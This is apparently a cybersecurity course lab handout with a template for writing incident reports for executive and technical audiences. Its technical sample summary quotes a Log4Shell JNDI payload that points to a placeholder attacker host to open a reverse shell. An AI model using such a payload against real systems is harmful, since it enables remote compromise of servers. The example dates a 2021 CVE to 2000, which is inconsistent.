This lab aims to introduce some core report-writing components and give the student a template to refer to for future reports.

While technical skills and acumen are core components to the cybersecurity field, they mean next to nothing if the findings and results cannot be properly communicated to a technical and non-technical audience. Imagine yourself in the following scenario:

You’re working at a company as a Cyber Security Analyst when you receive multiple alerts to investigate. The alert indicates that multiple suspicious executable files have been downloaded over HTTP. Your security suite started recording a pcap of the initial download as well. What do you do?

For this lab, your instructor will provide a walkthrough of a compromise and begin to formulate a report to summarize what happened. Use the fields and descriptions below to reference in your own reports for the duration of the class!

• We can use generic terms here:

  1. A user’s workstation
  2. A user account
  3. A server
  4. Domain

• How would you summarize this attack if you were talking to a Link: Five-Year-Old?

• Your audience is an executive - what information do they need to know?

  1. What is the extent of the attack?
  2. Do we know what (if any) data was taken?
  3. How would our business be impacted?

• Does this impact or have the potential to impact any of the following?

  1. Confidentiality - Can users/threat actors access data/systems that they shouldn’t as a result?
  2. Integrity - Is the integrity of our systems/applications/data compromised?
  3. Availability - Is access to critical resources negatively impacted as a result?

• When did this attack occur?

• Where in the network did this attack occur?
• Was there more than one machine involved? Do we know at this time?

• What general techniques did they use?

  1. A user opened a phishing email
  2. A vulnerability in our server was exploited

On November 5th 2000 at 12:00:00 one of our public servers was compromised by a vulnerability. This server houses customer data however, it appears the threat actor only accessed files that are already listed on our public website.

• Use specific terms here:

  1. Workstation EC2AMAZ-HOSTNAME
  2. An Administrator account/user Elliot Alderman
  3. IP address of machine
  4. IP address/domain of attacker

• How would you summarize this attack if you were talking to one of your instructors?

• Your audience is an technical manager - what information do they need to know?

  1. What is a chronological synopsis of the attack?
  2. What techniques did they employ?
  3. How were they detected? Can we detect this moving forward?

• Does this impact of have the potential to impact any of the following?

  1. Confidentiality - Can users/threat actors access data/systems that they shouldn’t as a result?
  2. Integrity - Is the integrity of our systems/applications/data compromised?
  3. Availability - Is access to critical resources negatively impacted as a result?

• When did this attack occur?

• Where in the network did this attack occur?
• Was there more than one machine involved? Do we know at this time?

• What specific techniques did they use?

  1. A user opened a phishing email containing a malicious .hta file that contained a VBS macro embedded.
  2. The vulnerability CVE-2021-44228 was exploited using xyz…

On November 5th 2000 at 12:00:00 our public-facing FTP server was compromised by the vulnerability CVE-2021-44228 using the payload "${jndi:ldap://<attackerIP>:1389**/Basic/ReverseShell/<attackerIP>/9999}". The payload points to a compromised server hosted at <URL or IP>. After the initial compromise, it appears the threat actor exfiltrated files that are already publicly available on our website versus any customer data.
`